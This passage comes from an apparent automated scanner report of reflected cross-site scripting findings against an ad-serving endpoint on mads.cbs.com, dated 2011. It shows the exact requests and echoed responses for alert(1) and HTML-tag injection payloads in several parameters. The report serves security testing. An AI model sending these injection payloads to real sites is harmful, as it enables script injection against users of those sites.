GET /mac-ad?META&ADSEPARATOR=%3B%0029242<script>alert(1)</script>c7413a93569&GLOBAL&REQID=1&CLIENT:ID=SJS&CELT=jph&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=c&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=86971413&ADREQ&SP=234&POS=100&cookiesOn=1&divId=cbs-pushdown&ADREQ&SP=266&POS=100&cookiesOn=1&divId=ads_magnet HTTP/1.1
Host: mads.cbs.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.cbs.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ABTEST_HOMEPAGE=S; CBS_ADV_VAL=c%3Bpage%3Dcbshome; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:00:13 GMT
Server: Apache/2.2
Content-Length: 1929
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Sun, 02 Oct 2011 23:00:13 GMT

/* MAC ad */cbsiParseAdResponse({requestId:"1",divId:"cbs-pushdown",segmentId:"1815",rotatorId:"17584",creativeSizeId:"4",isBlank:"1",seg_pageState:"",adHTML:"<!-- default ad --><img src=\"http://adlo
...[SNIP]...
"0\" WIDTH=\"0\" alt=\"\" style=\"position:absolute; top:0px; left:0px\" />"})/* MAC [r20110907-1630-TRUNKPOSTMERGE:1.13.14] phx1-ad-xw2.cnet.com::1395308864 2011.10.02.23.00.13 *//* MAC T 0.1.3.4 */;.29242<script>alert(1)</script>c7413a93569/* MAC ad */cbsiParseAdResponse({requestId:"1",divId:"ads_magnet",segmentId:"1815",rotatorId:"20384",creativeSizeId:"4",isBlank:"1",seg_pageState:"",adHTML:"<!-- default ad -->
...[SNIP]...

2.94. http://mads.cbs.com/mac-ad [NCAT parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://mads.cbs.com
Path:   /mac-ad

Issue detail

The value of the NCAT request parameter is copied into the HTML document as plain text between tags. The payload 5a2fc<a>2abc7cc0824 was submitted in the NCAT parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=c&DVAR_GENRE=&NCAT=1%3A5a2fc<a>2abc7cc0824&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=58164046&ADREQ&beacon=1&cookiesOn=1 HTTP/1.1
Host: mads.cbs.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.cbs.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ABTEST_HOMEPAGE=S; CBS_ADV_VAL=c%3Bpage%3Dcbshome; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:02:43 GMT
Server: Apache/2.2
Content-Length: 507
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Sun, 02 Oct 2011 23:02:43 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=c&DVAR_GENRE=&NCAT=1%3A5a2fc<a>2abc7cc0824&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=58164046&ADREQ&beacon=1&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BEACON CALL (SITE='164' PTYPE='2000' NCAT='1:5a2fca2abc7cc0824:' CID=''
...[SNIP]...

2.95. http://mads.cbs.com/mac-ad [NCAT parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mads.cbs.com
Path:   /mac-ad

Issue detail

The value of the NCAT request parameter is copied into a JavaScript inline comment. The payload 75dfc*/alert(1)//0024477fb7b was submitted in the NCAT parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=c&DVAR_GENRE=&NCAT=1%3A75dfc*/alert(1)//0024477fb7b&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=78325244&ADREQ&SP=119&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbs.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.cbs.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ABTEST_HOMEPAGE=S; CBS_ADV_VAL=c%3Bpage%3Dcbshome; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:01:53 GMT
Server: Apache/2.2
Content-Length: 1139
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Sun, 02 Oct 2011 23:01:53 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=c&DVAR_GENRE=&NCAT=1%3A75dfc*/alert(1)//0024477fb7b&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=78325244&ADREQ&SP=119&POS=100&cookiesOn=1" _REQ_NUM="0" */document.write('<!-- default ad -->
...[SNIP]...

2.96. http://mads.cbs.com/mac-ad [NODE parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://mads.cbs.com
Path:   /mac-ad

Issue detail

The value of the NODE request parameter is copied into the HTML document as plain text between tags. The payload 7f24f<a>386fcc1b106 was submitted in the NODE parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=c&DVAR_GENRE=&NCAT=1%3A&NODE=17f24f<a>386fcc1b106&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=58164046&ADREQ&beacon=1&cookiesOn=1 HTTP/1.1
Host: mads.cbs.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.cbs.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ABTEST_HOMEPAGE=S; CBS_ADV_VAL=c%3Bpage%3Dcbshome; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:03:08 GMT
Server: Apache/2.2
Content-Length: 489
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Sun, 02 Oct 2011 23:03:08 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=c&DVAR_GENRE=&NCAT=1%3A&NODE=17f24f<a>386fcc1b106&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=58164046&ADREQ&beacon=1&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BEACON CALL (SITE='164' PTYPE='2000' NCAT='1:' CID='' TO BEACON TEXT) *//* MAC
...[SNIP]...

2.97. http://mads.cbs.com/mac-ad [NODE parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mads.cbs.com
Path:   /mac-ad

Issue detail

The value of the NODE request parameter is copied into a JavaScript inline comment. The payload a87b4*/alert(1)//bad25590d00 was submitted in the NODE parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=c&DVAR_GENRE=&NCAT=1%3A&NODE=1a87b4*/alert(1)//bad25590d00&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=78325244&ADREQ&SP=119&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbs.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.cbs.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ABTEST_HOMEPAGE=S; CBS_ADV_VAL=c%3Bpage%3Dcbshome; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:02:09 GMT
Server: Apache/2.2
Content-Length: 1117
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Sun, 02 Oct 2011 23:02:09 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=c&DVAR_GENRE=&NCAT=1%3A&NODE=1a87b4*/alert(1)//bad25590d00&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=78325244&ADREQ&SP=119&POS=100&cookiesOn=1" _REQ_NUM="0" */document.write('<!-- default ad -->
...[SNIP]...

2.98. http://mads.cbs.com/mac-ad [PAGESTATE parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mads.cbs.com
Path:   /mac-ad

Issue detail

The value of the PAGESTATE request parameter is copied into a JavaScript inline comment. The payload 7f52a*/alert(1)//77f952ac5d1 was submitted in the PAGESTATE parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=7f52a*/alert(1)//77f952ac5d1&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=c&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=78325244&ADREQ&SP=119&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbs.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.cbs.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ABTEST_HOMEPAGE=S; CBS_ADV_VAL=c%3Bpage%3Dcbshome; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:00:17 GMT
Server: Apache/2.2
Content-Length: 1144
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Sun, 02 Oct 2011 23:00:17 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=7f52a*/alert(1)//77f952ac5d1&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=c&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=78325244&ADREQ&SP=119&POS=100&cookiesOn=1" _REQ_NUM="0" */document.write('<!-- default ad
...[SNIP]...

2.99. http://mads.cbs.com/mac-ad [PAGESTATE parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mads.cbs.com
Path:   /mac-ad

Issue detail

The value of the PAGESTATE request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 85129'%3balert(1)//d06e92eeed was submitted in the PAGESTATE parameter. This input was echoed as 85129';alert(1)//d06e92eeed in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=85129'%3balert(1)//d06e92eeed&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=c&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=78325244&ADREQ&SP=119&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbs.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.cbs.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ABTEST_HOMEPAGE=S; CBS_ADV_VAL=c%3Bpage%3Dcbshome; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:00:15 GMT
Server: Apache/2.2
Content-Length: 1145
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Sun, 02 Oct 2011 23:00:15 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=85129'%3balert(1)//d06e92eeed&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=c&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR
...[SNIP]...
sion%253dc&amp;ucat_rsi=%2526&amp;pg=&amp;t=2011.10.02.23.00.15/http://i.i.com.com/cnwk.1d/Ads/common/dotclear.gif" style="position:absolute; top:0px; left:0px" width="0" />');
;window.CBSI_PAGESTATE='85129';alert(1)//d06e92eeed';/* MAC [r20110907-1630-TRUNKPOSTMERGE:1.13.14] phx1-ad-xw7.cnet.com::1776052544 2011.10.02.23.00.15 *//* MAC T 0.1.3.4 */

2.100. http://mads.cbs.com/mac-ad [POS parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://mads.cbs.com
Path:   /mac-ad

Issue detail

The value of the POS request parameter is copied into the HTML document as plain text between tags. The payload 440d4<a>a86f0111d87 was submitted in the POS parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=c&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=78325244&ADREQ&SP=119&POS=100440d4<a>a86f0111d87&cookiesOn=1 HTTP/1.1
Host: mads.cbs.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.cbs.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ABTEST_HOMEPAGE=S; CBS_ADV_VAL=c%3Bpage%3Dcbshome; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:03:07 GMT
Server: Apache/2.2
Content-Length: 573
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Sun, 02 Oct 2011 23:03:07 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=c&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=78325244&ADREQ&SP=119&POS=100440d4<a>a86f0111d87&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP ( _MAPPINGS='CBS' BRAND='57' SITE='164' SP='119' CNET-PTYPE='10' POS='100440d4aa86f0111d87' NCAT='1:' CNET-PARTNER-ID='1' DVAR_PSID='' ) TO
...[SNIP]...

2.101. http://mads.cbs.com/mac-ad [PTYPE parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://mads.cbs.com
Path:   /mac-ad

Issue detail

The value of the PTYPE request parameter is copied into the HTML document as plain text between tags. The payload 7134c<a>f75ef922c36 was submitted in the PTYPE parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=20007134c<a>f75ef922c36&BRAND=57&DVAR_SESSION=c&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=58164046&ADREQ&beacon=1&cookiesOn=1 HTTP/1.1
Host: mads.cbs.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.cbs.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ABTEST_HOMEPAGE=S; CBS_ADV_VAL=c%3Bpage%3Dcbshome; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:01:07 GMT
Server: Apache/2.2
Content-Length: 506
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Sun, 02 Oct 2011 23:01:07 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=20007134c<a>f75ef922c36&BRAND=57&DVAR_SESSION=c&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=58164046&ADREQ&beacon=1&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BEACON CALL (SITE='164' P
...[SNIP]...

2.102. http://mads.cbs.com/mac-ad [PTYPE parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mads.cbs.com
Path:   /mac-ad

Issue detail

The value of the PTYPE request parameter is copied into a JavaScript inline comment. The payload 12c80*/alert(1)//b5149415f30 was submitted in the PTYPE parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=200012c80*/alert(1)//b5149415f30&BRAND=57&DVAR_SESSION=c&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=78325244&ADREQ&SP=119&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbs.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.cbs.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ABTEST_HOMEPAGE=S; CBS_ADV_VAL=c%3Bpage%3Dcbshome; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:00:57 GMT
Server: Apache/2.2
Content-Length: 1117
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Sun, 02 Oct 2011 23:00:57 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=200012c80*/alert(1)//b5149415f30&BRAND=57&DVAR_SESSION=c&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=78325244&ADREQ&SP=119&POS=100&cookiesOn=1" _REQ_NUM="0" */document.write('<!-- default ad -->
...[SNIP]...

2.103. http://mads.cbs.com/mac-ad [SITE parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://mads.cbs.com
Path:   /mac-ad

Issue detail

The value of the SITE request parameter is copied into the HTML document as plain text between tags. The payload fa7c5<a>619528a5f81 was submitted in the SITE parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164fa7c5<a>619528a5f81&PTYPE=2000&BRAND=57&DVAR_SESSION=c&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=78325244&ADREQ&SP=119&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbs.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.cbs.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ABTEST_HOMEPAGE=S; CBS_ADV_VAL=c%3Bpage%3Dcbshome; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:00:22 GMT
Server: Apache/2.2
Content-Length: 533
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Sun, 02 Oct 2011 23:00:22 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164fa7c5<a>619528a5f81&PTYPE=2000&BRAND=57&DVAR_SESSION=c&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=78325244&ADREQ&SP=119&POS=100&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BRAND=&q
...[SNIP]...

2.104. http://mads.cbs.com/mac-ad [cookiesOn parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://mads.cbs.com
Path:   /mac-ad

Issue detail

The value of the cookiesOn request parameter is copied into the HTML document as plain text between tags. The payload 8b61d<a>d3e1750ed63 was submitted in the cookiesOn parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=c&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=18b61d<a>d3e1750ed63&DVAR_INSTLANG=en-US&x-cb=58164046&ADREQ&beacon=1&cookiesOn=1 HTTP/1.1
Host: mads.cbs.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.cbs.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ABTEST_HOMEPAGE=S; CBS_ADV_VAL=c%3Bpage%3Dcbshome; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:03:32 GMT
Server: Apache/2.2
Content-Length: 489
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Sun, 02 Oct 2011 23:03:32 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=c&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=18b61d<a>d3e1750ed63&DVAR_INSTLANG=en-US&x-cb=58164046&ADREQ&beacon=1&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BEACON CALL (SITE='164' PTYPE='2000' NCAT='1:' CID='' TO BEACON TEXT) *//* MAC [r20110907-
...[SNIP]...

2.105. http://mads.cbs.com/mac-ad [cookiesOn parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mads.cbs.com
Path:   /mac-ad

Issue detail

The value of the cookiesOn request parameter is copied into a JavaScript inline comment. The payload 600d8*/alert(1)//748e5133e05 was submitted in the cookiesOn parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=c&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1600d8*/alert(1)//748e5133e05&DVAR_INSTLANG=en-US&x-cb=78325244&ADREQ&SP=119&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbs.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.cbs.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ABTEST_HOMEPAGE=S; CBS_ADV_VAL=c%3Bpage%3Dcbshome; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:02:15 GMT
Server: Apache/2.2
Content-Length: 1091
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Sun, 02 Oct 2011 23:02:15 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=c&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1600d8*/alert(1)//748e5133e05&DVAR_INSTLANG=en-US&x-cb=78325244&ADREQ&SP=119&POS=100&cookiesOn=1" _REQ_NUM="0" */document.write('<!-- default ad -->
...[SNIP]...

2.106. http://mads.cbs.com/mac-ad [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://mads.cbs.com
Path:   /mac-ad

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 5daa3<a>6676c279d3d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

